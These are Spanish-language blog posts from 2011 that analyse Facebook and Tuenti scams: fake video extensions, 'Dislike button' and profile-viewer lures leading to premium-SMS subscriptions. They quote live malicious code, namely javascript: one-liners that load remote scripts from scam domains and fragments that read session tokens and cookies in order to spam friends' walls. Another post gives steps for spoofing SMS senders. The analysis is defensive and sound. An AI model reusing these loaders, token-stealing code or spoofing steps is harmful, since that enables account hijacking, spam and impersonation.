lunes, 12 de diciembre de 2011

Desinstalar el famoso "virus del video" de Facebook


En un principio no iba a escribir nada sobre esto pero este post tiene que ver con la última entrada. Al final lo explico.
Hoy al meterme en facebook en mi perfil había lo siguiente, y parece ser que a más de una persona le ha pasado:

 Como no, he dudado bastante y me he imaginado que estaba ante otra de esas estafas que se extienden.

Pasos que he seguido para analizar un poco lo que pasa:
[También explico como des-instalar el comúnmente llamado "virus de Facebook" aunque no tenga nada que ver ni con un virus ni con Facebook.]

    1) He clickado en el link para ver donde me llevaba ese sospechoso vídeo.



     2) Dicho link me ha llevado a esta página:

     Si nos fijamos en la barra de direcciones, podemos ver que ya estamos fuera de Facebook, por lo que se nos debería de hacer extraño.
    Nos dicen que para poder ver el video clickemos en Continue

    No clickeis, si lo habéis hecho y usáis Firefox os saldrá una alerta diciendo que se quiere instalar el plugin, pulsar en la x o en "esta vez no". Y si ya lo habéis instalado al final os explico como eliminarlo.

    3) Si queréis ver que archivo se os instala he mirado el código fuente de la página web y hay un script con lo siguiente:

                <script>
                var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;
                var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;
                function instalar(){
                    if (is_chrome){
                        window.open("http://vevideo.com.es/plugin/youtube.crx");
                    } else if(is_firefox){
                        var params = {
                            "Youtube Extension": {
                                URL: "http://vevideo.com.es/plugin/youtube.xpi",
                                toString: function () { return this.URL; }
                            }
                        };
                        InstallTrigger.install(params);
                    } else{
                         top.location.href="http://vevideo.com.es/plugin/unlocked.php";
                    }
                }
            </script>

     Hay una función llamada instalar() que dependiendo si usas Chrome o si usas Firefox te descarga el archivo correspondiente para el navegador. (esta vez los de Internet Explorer están a salvo!)

    Me he bajado ambas versiones, una para instalarlo en un navegador que tengo para hacer pruebas y la otra par ver el código interno y ver un poco que hace.
    Yo me he bajado la extensión para firefox, tiene una extensión .xpi pero con un simple renombrar a .zip ya se puede descomprimir el fichero y ver todo lo que hay dentro. (Aquí el fichero por si le queréis echar un vistazo).

    4) A la hora de instalarlo te sale esto:


    Una vez instalado F5 y te sale esto otro:



    Y tachán! aquí esta lo que mencionaba sólo empezar este post diciendo que tenía que ver con la anterior entrada:



      Volvemos a estar ante la misma página que nos aseguraba que podríamos ver quien visita nuestro perfil de tuenti si ingresábamos nuestro número. Otra vez nombran (Actualizo para aclarar malinterpretaciones (16-12-11): en ningún momento digo que sean ellos los responsables de todo esto, no sería de extrañar que hayan contratado a una subempresa) a la empresa "X" y si leemos la letra pequeña otra vez nos puedo costar unos 35€/mes la broma... Y obviamente, seguiremos sin poder ver el vídeo que nos prometían.





    5) Respecto a la extensión/plugin o comúnmente llamado "virus o algo así del facebook" x) que se nos ha instalado en nuestro navegador, voy a mencionar varias cosas sobre el código.

     En el archivo youtube.js de la extensión que nos hacen instalar se ve lo siguiente

     loadScript_you();
    function loadScript_you() {
    ...
        s.setAttribute("src", "http://vevideo.com.es/plugin/script.js");
    ...
    }
    En dicho código javascript se llama a este otro:
    http://vevideo.com.es/plugin/extra.js
      
    var blogs = new Array();
blogs[0] = 'http://ferdie11.blogspot.com/';
blogs[1] = 'http://ferdie22.blogspot.com/';
blogs[2] = 'http://ferdie333.blogspot.com/';
blogs[3] = 'http://ferdie44.blogspot.com/';
...

randno2 = Math.floor ( Math.random() * blogs.length );
blog=blogs[randno2];
     ...
    function enchulatuFB(){...

    var post_form_id=document['getElementsByName']('post_form_id')[0]['value'];
    var fb_dtsg=document['getElementsByName']('fb_dtsg')[0]['value'];
    var video_url=blog;
    var domains=['http://i43.tinypic.com/k1a1rd.png'];
    var p0=['.'];
    var p1=['hola','como va','como estas!','Que tal','Hola!','Mira!'];
    var p2=['has visto que','ya vistes que','sabes que'];
    var p3=[' sales en un video??'];
    var message='';
    var a;
    gf=new XMLHttpRequest();     ...

    Como se puede observar, crean tres vectores para crear frases aleatorias saludándote y preguntándote de distintas formas si has visto el vídeo. Estás serán las que luego escribirás a tus amigos sin tú consentimiento.
    También se puede ver la dirección de la imagen que se agrega a dicho comentario (la foto borrosa de gente de fiesta).

    Otra cosa que me ha parecido curiosa es el comienzo del código, crean otro array de blogs, supongo que lo deben hacer para que siempre hayan enlaces vivos por facebook para que los usuarios sigan clickando, así, aunque los usuarios de facebook denuncie como spam el vídeo que le han puesto en su muro, creo que sólo se marca como spam lo que venga de ese blog, por lo que si tienen diversos blogs como (http://roter5.blogspot.com/, http://aderf6.blogspot.com/ o http://deltw6.blogspot.com/) siempre les quedarán webs activas donde alojar su código "malicioso ".


    En resumen, un amigo nos dice si hemos visto el video dónde tú sales, la gente clicka, se instala el plugin/extensión para "poder ver el video", dicho video no existe pero ahora tienes una extensión en tu navegador la cual hará que vayas escribiendo sin tu consentimiento a muros aleatorios de tus amigos si han visto un video dónde salen, y así sucesivamente.
    ¿Y para qué hacen esto? Facebook tiene más de 500 millones de usuarios registrados, es decir, hay más usuarios registrados en Facebook que habitantes viviendo en Europa. Por lo que tan sólo se instale una minoría el plugin, es muy fácil que se extienda, y con que una minoría haga todos los pasos e ingrese al final su número de teléfono para "poder ver el vídeo", ya se pueden imaginar la de cantidad de dinero que pueden hacer si cada mes pueden llegar a ganar 35€/persona. Respuesta: Lo hacen por dinero.



    Si te has enterado ahora de esto y ya te has instalado dicho plugin/extensión tan sólo tienes que hacer esto:

    • Si usas Chrome como navegador pulsa en  Herramientas-Extensiones y te saldrá algo así:
     
    Pulsas en Desisntalar y ya está.


    • Si usas Firefox (Mozilla) tan sólo tendrás que pulsar en Herramientas-Complementos, ir a la pestaña de Plugins y donde ponga Extension YouTube pulsar en Desactivar y/o Eliminar



    Conclusiones:
    • No se fíen de todo lo que les aparece en vuestro muro.
    • Eviten insertar el número de teléfono por Internet.
    • Si los propios navegadores os advierten de que es peligroso instalar una extensión o un plugin, hagan caso a no ser que sepan que están haciendo exactamente.


    Publicado por ferro en 2:16 26 comentarios

    domingo, 11 de diciembre de 2011

    Tuenti: "Fallo que te permite ver quien te visita"?

    Hoy voy rápido:
    Hace un par de días me conecté a tuenti y me habían invitado a un evento que decía lo siguiente: 
    HAY UN FALLO QUE PERMITE VER QUIEN TE VISITA!!! Cuando alguien te visita, se aumenta una visita a tu contador, pero no se puede ver quien fue el que realizo la visita. Con esta aplicación podrás averiguar quien fue, ya que debido a un fallo, se puede averiguar.
    Para descargar la aplicación haz click en el siguiente enlace: http://goo.gl/vO28y

    Como siempre (ver mi otras entradas aquí o aquí), no es verdad.
    Aquí la demostración:
    • 1) Clicko y tuenti ya me avisa de que tenga cuidado, pulso en continuar y me redirigen un par de veces (live http headers & NoScript activados) hasta llegar a una página para introducir tú móvil.
    [http://ese.sinfindejuegos.com/wsb/Subscribe.aspx?i=241f7cda-3157-4c55-94e4-d42d922cf733]



    • 2) En dichas re-direcciones, se pasa por un servidor APACHE! con CentOS como sistema operativo.
    (La dirección del servidor: http://50.116.87.18/) Si metemos la dirección del servidor en la barra de direcciones de puede ver algo así "Apache 2 Test Page powered by CentOS

    • 3) Pruebo ssh desde consola y lo tiene activo. También pruebo ftp y lo mismo. Pero como era de imaginar ambos con contraseña.

    • 4) Hago un traceRoute y...: "50.116.87.18 is from United States(US) in region North America" parece ser que el servidor que nos ha redirigido está en America.
    • 5) Por curiosidad miro un poco la letra pequeña de la web dónde nos pedían el número movil y nombran una empresa llamada "X".
    Servicio de suscripción para descargar contenidos para móvil por tan sólo 1,42 € (IVA incluido) por sms recib. + precio de navegación wap, consulte con su operador. Máx.6 sms/sem.

     Vamos, que si te das de alta para poder "ver quien te visita en tuenti" y tardas un mes en darte cuenta de que en realidad te has suscrito en este servicio, te llega una factura de (1.42*6*4)  35 eurillos...  Y obviamente, sigues sin poder ver quien te visita x)

    •  6) Con una herramienta de la universidad de Zaragoza analizo la empresa y esta es una sociedad limitada, está en sevilla, su web es www.X-mm.com, su actividad dicen que es "SERVICIOS DE PUBLICIDAD" y el Director ejecutivo es un tal XYZ con unos apellidos ingleses, en http://cargos.axesor.es/  he encontrado información sobre él. (Prefiero no nombrar a ninguna persona concreta en mi blog).
    No creo que sea él realmente quien haga todo esto , seguramente haya contratado una subempresa (y posiblemente americana) sin saber cómo iban a trabajar.

    Esta vez no me ha dado tiempo a mirar el código que estaba alojado en el servidor de America, lo han quitado muy rápido. Tanto la web del servidor, como el evento de tuenti.

    ¿Conclusiones?
    1. No hacer ni caso a este tipo de eventos
    2. No insertar nunca tu  número de teléfono por internet, a no ser que estés seguro de que sabes lo que haces.










    Publicado por ferro en 18:59 2 comentarios

    jueves, 30 de junio de 2011

    Enviar SMS GRATIS... ¡Con el remitente personalizado!


     
    Sí, estáis leyendo bien, a día de hoy es posible enviar SMS gratis haciéndose pasar por quien se quiera. Es decir, al destinatario le llegará el SMS que se haya enviado con el remitente que se haya elegido. Y sí, aquí se va a explicar cómo puede ser esto posible, por qué NO se debe hacer, qué problemática nos puede acarrear este tipo de servicio y cómo está regulado legalmente un mal uso de este servicio.
                                                                   
     Primero de todo debo comenzar por aquí: La usurpación de identidad es delito si la conducta encaja con el artículo 401 del código penal: “El que usurpare el estado civil de otro será castigado con la pena de prisión de seis meses a tres años.” Es decir, se está cometiendo un delito  si se usurpa el estado civil de otro (hacerse pasar por otro) y en tal caso, esta conducta puede ser castigada con la pena de prisión.


    También quiero nombrar los artículos 403 y 637 del código penal español (echarle un ojo), viene a decir que hacerte pasar por una persona en concreto con la intención de atribuirte una función pública que no tienes con el fin de obtener algún beneficio, es delito y también está castigado.


    Después de este pequeño inciso tan sólo decir que NO me hago responsable del uso que podáis darle a este servicio. Vuestros actos son responsabilidad vuestra. No recomiendo un mal uso de este servicio, así que: ¡Sed responsables! =)


    Manos a la obra:
    Os voy mostrar un servicio que se basa en una red de interconexiones con más de mil operadoras en todo el mundo, ¡Y al ser por internet tiene cobertura en 200 países de los cinco continentes!

    (Para los informáticos: Además nos ponen a nuestra disposición la API para que podamos crear nuestras propias aplicaciones! =D)
      
     Como ya sabéis, para que el mensaje de texto que hemos enviado a nuestro amigo le llegue, primero tiene que pasar por una serie de GATEWAYS (se guardan temporalmente en estos), y seguidamente llega al destinatario deseado. Es más, hay compañías que pueden mandar SMS desde internet, y como es obvio, están conectadas a internet. En ocasiones, esto implica un grave problema, y es que a veces no validan de que móvil vienen los SMS, por lo que es posible que se pueda falsificar el remitente del SMS con varios servicios que están operativos en internet, incluso gratuitamente, como es el caso de Lleida.net.

    Mi primera conclusión: Los SMS no tienen nada de seguro.

    Pero, ¿Es tan fácil ser una víctima de una usurpación y que nos llegue algún SMS de un amigo sin su consentimiento/conocimiento? Aquí lo explico:
     
    Esta ya todo hecho, a cualquiera nos puede llegar un SMS con el remitente falsificado, una forma muy sencilla para que nos envíen un SMS con el remitente personalizado es utilizando el servicio que ofrece Lleida.net, tan solo tendrían que registrarse en http://smsmasivo.lleida.net/es/alta.html y empezar a hacerse pasar por otras personas. Inicialmente tienen 20 créditos para gastar (unos 13 SMS gratuitos con el remitente personalizado, 20 SMS gratuitos sin personalizar) Cuando se les hayan acabado los 20 créditos se podrían volver a registrar con otro número, o en su defecto, comprar más créditos (además a muy bien de precio). Es decir, es tan fácil que nos puede engañar cualquier persona que sepa abrir el navegador de internet y dar 4 clicks.


    Yo me he registrado para ver cuánto de fácil es todo esto y demostrar que funciona, he hecho una prueba, he enviado un SMS a mi móvil modificando el remitente (con el consentimiento y presencia del titular de dicho remitente, para evitar problemas). Para registrarnos nos envían un SMS con un código de confirmación, lo insertamos en la web y listo.
    ,

    Luego tenemos que entrar en http://websms.lleida.net/ con el usuario y contraseña que nos hayan asignado (nos envían un correo). Al entrar se ve algo así:
     

    Tan sólo se tiene que escribir el mensaje, el destinatario y el remitente. ¡Y ya está! Aquí os dejo otra captura de pantalla y os explico que opciones hay:
     

    Dato importante: los números de teléfono tienen que estar en formato internacional. (España +34666666666).
    En el cuadro de texto de mensaje se pone el SMS que le llegará al destinatario, en teléfono/teléfonos el destinatario +34666666666, en remitente se indica quién está enviando el SMS (es posible, pero ilegal, hacerse pasar por otra persona), si se desea acuse de recibo se marca en el cuadradito y si queremos programar una fecha de envío, pues lo mismo, se indica cuando se quiere que se envíe el mensaje.
    Arriba a la izquierda se pueden observar los créditos que quedan, cuantas más opciones se marquen más créditos se restan, (en la página principal muestran los costes) por ejemplo, enviar un SMS simple a movistar cuesta 1 crédito, y enviar un SMS a movistar modificando el remitente cuesta 1.5 créditos.

    Una vez que se hayan insertado todos los datos se clicka en "Enviar mensaje".
    Como habréis podido comprobar es realmente fácil que algún día tengamos en nuestra bandeja de entrada del móvil un SMS de un amigo, aunque realmente él no haya enviado nada. En estos casos ¿Qué debemos hacer? En el caso que queramos denunciarlo, tenemos dos vías:
    A) Contactar con el servicio desde el que ha sido enviado el SMS (cosa muy complicada ya que, a no ser que nos lo digan, no podemos saber qué servicio ha usado el “delincuente”)

    B) Recurrir a las Fuerzas y/o Cuerpos de Seguridad del Estado. (Vamos, ir a denunciar a la Policía o a la Guardia Civil). (Recomendado, si es algo serio.)


    Como todo el mundo puede comprobar los SMS no son tan seguros como parecen, personalmente me parece increíble que existan servicios como este, si dejan correr la imaginación hay miles de posibilidades si alguien piensa en explotar la deficiente seguridad de los medios en los que se mueven nuestros SMS, por lo que insisto en que nadie utilice este servicio ni para estafar a nadie ni para hacer nada que pueda perjudicar a alguien ya que se estaríais utilizando los beneficios que proporciona la informática para finalidades ilegitimas por lo que os pondríais en problemas legales.





    Espero que os haya gustado.
    Este artículo es meramente informativo y no me hago responsable del uso de este servicio.
    Darle buen uso. ;)
    Un saludo!


    Info consultada:
    http://www.tuabogadodefensor.com/01ecd193e810f1e01/CodigoPenal.htm
    http://smsmasivo.lleida.net/es/
    http://websms.lleida.net/
    http://www.seguridadblanca.org
    http://www.pabloburgueno.com/2009/07/colaborando-con-la-agencia-efe-para-un-articulo-sobre-identidades-falsas/
    Info interesante:
    http://www.securitybydefault.com/2011/05/preguntas-frecuentes-al-grupo-de.html
    http://www.profesiones.org/var/plain/storage/original/application/2faf40906d1c65d15d6069a8dd6fe8ae.pdf
    Agradecimientos a dos chicas muy profesionales: Sory y mi prima.

    Publicado por ferro en 19:03 9 comentarios

    sábado, 21 de mayo de 2011

    To get the Dislike button. [nueva estafa, mejorada]

    Y hoy algo parecido, seguimos ante el mismo escenario,  se prolifera el siguiente mensaje por los muros de tus amigos:
    "Facebook now has a dislike button! Click 'Enable Dislike Button' to turn on the new feature! Currently enabled by 2,921,784 Users!"


    La única diferencia de hoy es que esta vez han sido más "profesionales" y me parece digno de ser contado.
    Como siempre, activo no-script, clicko en "Enable Dislike Button" y me aparece lo siguiente: 

    La típica página web que nos pide que copiemos el código javascript en la barra de direcciones para poder añadir el botón Dislike:
    javascript:javascript:(a=(b=document).createElement('script')).src='//dislike.likex.me/button.js',b.body.appendChild(a);void(0)

    Sorprendentemente cuando abro la dirección http://dislike.likex.me/button.js para ver cuál es el código fuente de button.js, me aparece lo siguiente:
    ¡Han "encriptado el código"!, ejecutan todo el código javascript con la siguiente función:
    val(String.fromCharCode(...))
    Don't panic! Tan fácil es encriptarlo como desencriptarlo, existen varias aplicaciones gratuitas para ello. Si queréis pegarle un ojo al código "desencriptado", lo he subido a un servidor, clickar aquí: http://serverf.260mb.com/js/dislike.js

    Si analizamos el código podemos observar varias funciones y variables que nos hace sospechar que estamos otra vez ante una aplicación maliciosa:

    var randomnumber=Math.floor(Math.random()*99999);
var user_id = readCookie("c_user");
var user_name = document.getElementById('navAccountName').innerHTML;
    ...
    var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
    var friends = new Array();
gf = new XMLHttpRequest();

    function readCookie(name) {...}
    ...
    Esta vez nos cogen datos hasta de nuestra cookie!
    Como siempre, crea una tabla donde almacena a todos nuestros amigos y les escribe a todos en su muro el mensaje que he nombrado anteriormente, todo eso sin nuestra autorización.
    Al final una hay alerta que nos redirecciona a una web para que ingresemos nuestro número de telefono:
    

    alert("Account Verification Required To Enable The Dislike Button \n\ Please Press 'OK' To Verify Your Account.");
window.location = "http://dislike.likex.me/final.php?userid="+user_id+"&name="+user_name;

    Si entramos en dicha web nos aparece lo siguiente:
    Nos dan 6 maravillosas oportunidades de saber cuál es nuestro coeficiente intelectual, saber cuanto nos parecemos a Cristiano Ronaldo, o... mejor aún, ganar vale de Vueling, un iPhone 4, una pantalla plana 3d o un mini-portatil... ¿Quién no se va arriesgar a insertar su número de teléfono pudiendo hacernos con estos chachi-premios? Obviamente, yo no.
    Aquí os dejo las irresistibles ofertas:

    ¿En qué se basa su forma de negocio? Bajo mi punto de vista, pura probabilidad, de las millones de visitas que van a tener, seguro que alguien caerá en la trampa, sino mirar esto:

    Si analizamos el tráfico por la página web vemos que ya ha pasado gente de casi todas las partes del mundo, además siempre hay alguien conectado. Cuestión de tiempo que algún fan del chulo-playa de Cristiano Ronaldo ingrese su número para saber cuál es su compatibilidad con el futbolista....

    Otra cosa a comentar que me ha parecido curiosa es la letra pequeña de todas las páginas donde nos pedían que diéramos nuestro número, cada una era de una empresa distinta, así que supongo que los que han escrito este código malicioso será porque cobrarán de las diversas empresas que ofrecen esos servicios dependiendo del número de teléfonos obtenidos o del número de visitas.


    ¿Conclusión? La de siempre, no fiarse de las aplicaciones externas a facebook!
    Saludos!
    Publicado por ferro en 2:59 3 comentarios

    lunes, 16 de mayo de 2011

    Por fin el botón NO ME GUSTA en facebook ¿Cierto?

    Obviamente, no es cierto.
    Todos también habréis visto lo siguiente:

     Si clickamos en Instalar NO ME GUSTA vamos a: http://www.bottonnomegusta.com/?ref=nf y vemos lo siguiente:

     Copiamos el código y nos dan las siguientes instrucciones: Para instalar el boton tienes que borrar todas las letras donde dice http://www.facebook.com (barra de direcciones) y hacer click derecho, PEGAR, y una vez aparezcan unas letras pulsar ENTER

     Tenemos en el portapapeles almacenado el siguiente código (el que nos dicen que copiemos):
    javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://bottonnomegusta.com/nomegusta.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();

    Otra vez lo mismo que antes, una web maliciosa con un supuesto código malicioso y un número aleatorio como parámetro de entrada...

    Completamente la misma estructura que la entrada anterior (http://bottonnomegusta.com/nomegusta.js):
    var message = "Que bien, Facebook ha puesto por fin el boton NO ME GUSTA, si quieres tenerlo
                       tu tambien pulsa en el boton que sale aqui abajo, que dice Instalar NO ME GUSTA.";
var jsText = "http://www.bottonnomegusta.com";
var myText = "Instalar NO ME GUSTA";

var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
    ...
     
    Y también con una dirección "para ganar dinero" (ya profundizaré en ello cuando acabe exámenes):
    window.location = "http://www.bottonnomegusta.com/redirige_promo.php"
     
    Así pues, lo mismo que la entrada anterior, se puede ver que en las dos primeras variables se 
    almacenan nuestros dos tokens "post_form_id" y "fb_dtsg", y que en la tercera variable almacena 
    parte de la información de nuestra cookie (otra vez mala pinta...)

     
     Otra vez estamos ante un ataque CSRF, posiblemente sean los mismos que antes.
    Así que, no me canso de repetirlo: ¡No os fieis de este tipo de aplicaciones! 

    


    

    
----------------
    
modifico:[18-05-2011]
    
Acabo de ver otra versión, sale esto:  
    

    "Como mola :) xD Face puso el boton NO ME GUSTA,
    yo ya le doy a todo No me gusta jaja si quieres tenerlo tu tambien
    pulsa en el texto que sale aqui abajo, que pone NO ME GUSTA.";
    Y nos piden que copiemos este script:
    

    javascript:(a=(b=document).createElement('script')).src='//thebutonsfacebook.com/theb.js?'+Math.random(),b.body.appendChild(a);void(0)

    
Si analizamos el fichero theb.js al final del código se ve esto otro: 
    

    alert("Termine el ultimo paso y le enviaremos a su telefono la
    clave para activar el boton.");
window.location = "http://thebutonsfacebook.com/redirige_promo.php"
    Aquí está la respuesta al por qué de todo este alboroto: Al final nos redireccionan a esta web para que ingresemos nuestro número de telefono y así poder cobrarnos unos 50€ al mes por enviarnos sms.
    
Y direis... ¿Y quién se fia de poner su número por internet? Pues muy poca gente, pero esa dirección habrá sido visitada por millones de personas y sólo con que un 0.1% haya ingresado su número ya tienen la paga del mes más que ganada!
    Si entramos en la dirección de redirige_promo.php se puede ver esto: "Responsable del servicio: Datatalk Comunicaciones S.L" Una empresa de Madrid. Lo que no sé si habrá sido esta empresa la que ha creado la aplicación viral para facebook o si habrá sido una subcontrata que cobraba más por incentivos y quería ganar dinero de una forma rápida... Eso ya a la imaginación de cada uno.... =)
    

    

    


    

    

    

    

    

    
Publicado por
ferro


en
18:37


4
comentarios









    


    

    

    


    

    


    

    

    

    

    

    


    
¿Quién ha visto hoy mi perfil de facebook?

    

    

    

    

    

    Buenas a todos, utilizo este pequeño descanso de estudio para escribir esta mini entrada.
    Acabo de ver que en Facebook hay mucha gente con esto:

    

    Te puedes creer que 31 personas han visitado mi perfil hoy? Ademas me dice quien y la hora jejej, si quieres saberlo pulsa Escanear perfil aqui abajo y podras ver tu contador.

    

    Para variar, movido por la curiosidad ;), me he puesto a investigar. 
    Aquí os explico mis conclusiones: (Hoy no lo hago tan extenso que hay que estudiar!)

    

    Me ha aparecido en mi muro lo siguiente:

    
 Con la opción Escanear perfil" para que también podamos ver quién nos ha visitado hoy, obviamente me ha parecido muy extraño, por lo que he activado no-script y he pinchado a ver qué pasaba.
    

    Al pinchar vas a esta página: http://www.lectorperf.es/?ref=nf y te sale lo siguiente:
    Nos piden que clickemos en Copiar y que peguemos este código en nuestro navegador:
    javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://lectorperf.es/perfil.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();

    

     Estamos ante un código javascript, en el que una variable de entrada es Math.random() (Un sospechoso número aleatorio como la anterior vez.).
    En el código también se puede observar esta dirección: 'http://lectorperf.es/perfil.js (dirección donde se aloja el código javascript "malicioso"). Si observamos el código de perfil.js vemos lo siguiente:
    var message = "Te puedes creer que 31 personas han visitado mi
    perfil hoy? Ademas me dice quien y la hora jejej, si quieres
    saberlo pulsa Escanear perfilaqui abajo y podras ver tu contador.";
var jsText = "http://www.lectorperf.es";
var myText = "Escanear perfil";
     
    var post_form_id = document.getElementsByName('post_form_id')[0].value;
    var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
    var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
     
    var friends = new Array();
    gf = new XMLHttpRequest(); 
    gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=
             user&viewer=" + uid + "&"+Math.random(),false); 
    gf.send()
     ...
      
    Se puede ver que en las dos primeras variables se almacenan nuestros dos tokens "post_form_id" y "fb_dtsg", y que en la tercera variable almacena parte de la información de nuestra cookie :S (Mala pinta...)
    También se ve que crea una tabla llamada friends (var friends = new Array()).
     Y ya para qué hablar de la variable message...

    

    Último fragmento importante: 
    ...+ friends[i].uid +  "&user_message=" + message;
    httpwp.open("POST", urlwp, true);
    ...


    

    Conclusión: Volvemos a estar ante una aplicación de poco fiar. Y cómo no, las 31 visitas que dicen que hemos tenido son completamente falsas, tan sólo hace falta ver la variable message, siempre nos dicen lo mismo, es una frase predefinida que no cambia en ninguna parte del código. (modifico: a veces en vez de 31 visitas ponen otro número, pero sigue siendo lo mismo, una varible global del script, es decir, sigue siendo un engaño. modifico2: Ahora mismo lo han cambiado por 21 visitas: Te puedes creer que 21 personas han visitado mi perfil hoy?... Suponqo que irán cambiando de poco en poco, aunque me parece extraño que no hayan usado Math.random() para que las visitas parezcan más realistas.)
    Lo único que hace este script es coger nuestros dos tokens "post_form_id" y "fb_dtsg" para poder realizar un ataque CSRF, en este caso el "ataque" consiste en escribir en el tablón de alguno de nuestros amigos que no nos perdamos la increíble aplicación que nos dice las visitas que hemos tenido hoy.

    

     Como siempre digo... ¡Cuidad vuestra seguridad con las aplicaciones sospechosas de facebook! Esta vez el fin de esta aplicación tan sólo ha sido crear spam (para forrar a unos cuantos... otro día hablaré de ello.) pero en otras ocasiones nos podrían tomar el control de la cuenta!

    

    Así que, ¡No os fieis de este tipo de aplicaciones! 
    

    

    

    

    
Publicado por
ferro


en
18:24


6
comentarios









    


    

    

    


    

    


    

    

    

    

            
    
          

          
    
        

    lunes, 2 de mayo de 2011
    

          
    
        

    

    


    
Mis 3 formas de evitar el Spam.

    

    

    

    

    
  
    

    Que levante la mano todo aquél que alguna vez haya recibido algún mensaje con asuntos de este tipo: "viagra a bajo precio", "has sido elegido, te ha tocado un fabuloso viaje", "el increíble MSN y facebook espía...", "adelgaza con nuestro innovador método", "el facebook del sexo", "gana increíbles premios"... Para qué seguir, a lo largo de nuestra vida a todo el mundo nos ha llegado un sinfín de mensajes de este tipo. 

    
Antes de todo me gustaría dar una definición sobre qué es exactamente el spam: "Se llama spam, correo basura o mensaje basura a los mensajes no solicitados, no deseados o de remitente no conocido, habitualmente de tipo publicitario, enviados en grandes cantidades (incluso masivas) que perjudican de alguna o varias maneras al receptor." [fuente: wikipedia]

    
Es decir, todos esos mensajes con contenido fraudulento que tenemos en la bandeja de entrada de nuestro correo sin que nosotros hayamos pedido información.  
    Aún recuerdo hace 3 años cuando apenas nadie teníamos facebook o tuenti, siempre tenía la bandeja de entrada con catatientos mensajes de spam y tropecientosmil mensajes de cadenas que debías reenviar si no querías que una maldición te persiguiera toda la vida (debí hacerles caso, así de maldito me he quedado...jaja). Afortunadamente, ahora con todo esto de las redes sociales los mensajes de no romper cadenas prácticamente han desaparecido de nuestro correo (sustituidos por los famosos eventos en dichas redes sociales). Aun así, nos sigue llegando correo no deseado.
    

    

    Voy ya al grano: 
    ¿Qué hago yo para evitar el spam? 
    Intentar dar mi correo electrónico lo menos posible a cualquier página web, para ello hago básicamente 3 cosas: 

    

    
BugMeNot 
    Cuando estamos navegando y queremos descargarnos algún programilla, película, juego, discografía, o simplemente si queremos acceder a más información en algún foro, muchas veces nos piden que para continuar debemos darles obligatoriamente una dirección de correo o que iniciemos sesión con nuestro usuario y contraseña. Si damos nuestra dirección nos arriesgamos a que luego nos llegue correo spam. Para evitar dar nuestro correo lo primero que hago es tirar de Bugmenot. 
    Bugmenot tiene una base de datos con usuarios y contraseñas de gran cantidad de páginas webs que restringen su información o datos a todos aquellos que no estamos registrados. Para poder identificarnos en dichas webs sin necesidad de dar nuestro correo para registrarnos tan sólo tenemos que entrar en http://www.bugmenot.com/ ,poner la dirección de la página web de la que queremos un usuario y contraseña, y por último clickar en "Get logins". Tacháán! ya podremos acceder a los contenidos para gente registrada, iniciamos sesión con el usuario y contraseña que nos han dado y listo. ;)
    

    

    Guerrilla Mail 
    Este servicio es muy útil en el caso de que nos pidan nuestro correo electrónico. Si es así, entro en http://www.guerrillamail.com/ y sólo entrar la propia web se encarga de darnos una cuenta de correo de "usar y tirar", es decir, te dan una cuenta que tiene una hora de duración, lo suficiente para que des "tu dirección" a la web que te lo pide. Lo bueno de este servicio es que en el caso de que te envíen un mensaje de confirmación, por ejemplo, un mensaje con una contraseña o con un código para poder continuar la descarga, simplemente tienes que estar pendiente en la página de guerrillamail de que te llegue el mensaje y ya está,  es más, ¡Puedes hasta contestar los mensajes! (muy útil si te piden un mensaje de confirmación).
    

    

    tempalias 
    Por último, para no caer en las manos de spammers, siempre que tengo que dar mi dirección de correo en alguna página web o foro para que me envíen o contesten a algo utilizo el servicio de tempalias, lo que hace este servicio es darte una dirección de correo (también temporal) que redirecciona todos los e-mails que le lleguen a tu correo de verdad. Lo único que se tiene que hacer es entrar en http://tempalias.com/#/ , poner tu dirección de correo para que te redireccionen allí los e-mails, indicar la duración de dicha cuenta y listo, te aparecerá una dirección de correo temporal que durará el tiempo que hayas indicado. Así que, cuando quieras que te envíen un mensaje a tu correo pero no quieres que sepan tu dirección real, da la dirección que te ha dado tempalias y la misma web se encargará de redireccionarte a ti los mensajes.
    

    

    Ni que decir tiene que nunca debemos dar nuestra dirección de correo a esos banner de publicidad que inspiran tanta confianza rezando "no es broma" con muchas más exclamaciones de lo tipográficamente aceptable...
    

    

    

    Para acabar, una curiosidad que me ha hecho gracia: Parece ser que la palabra spam proviene de un producto de USA llamado Hormel's Spiced Ham. 
    Con el tiempo el grupo Monty Python empezó a burlarse del producto (carne enlatada) por la costumbre de gritar la palabra spam en la mayoría de sus anuncios publicitarios, más tarde el termino se trasladó al correo electrónico no solicitado.
    

    

    

    Espero que a alguien le sirva de utilidad.
    Muchas gracias a quienes hayan leído todo =)
    Saludos!
    

    

    

    

    
Publicado por
ferro


en
1:26


1 comentarios









    


    

    

    


    

    


    

    

    

    

            
    
          

          
    
        

    sábado, 23 de abril de 2011
    

          
    
        

    

    


    
Analizando aplicación sospechosa. [Ver quién ve tu perfil]

    

    

    

    

    

    
  
    

    Post para todos aquellos que usan facebook y le están dando a "ver quién ve tu perfil" o clickando en enlaces de las páginas como "WOW ahora facebook le permite ver quién ve tu perfil!":

    

    He visto que esta mañana en el facebook había bastante gente con algo así:
    Catálogo Mi Perfil Visualizadores:
    nombre apellido1 apellido2 - 1136 vistas
    nombre apellido1 apellido2 - 983 vistas
    nombre apellido1 apellido2 - 542 vistas
    nombre apellido1 apellido2 - 300 vistas n Descubre a quién visto tu perfil @ http://216.119.148.83/spy.php

    

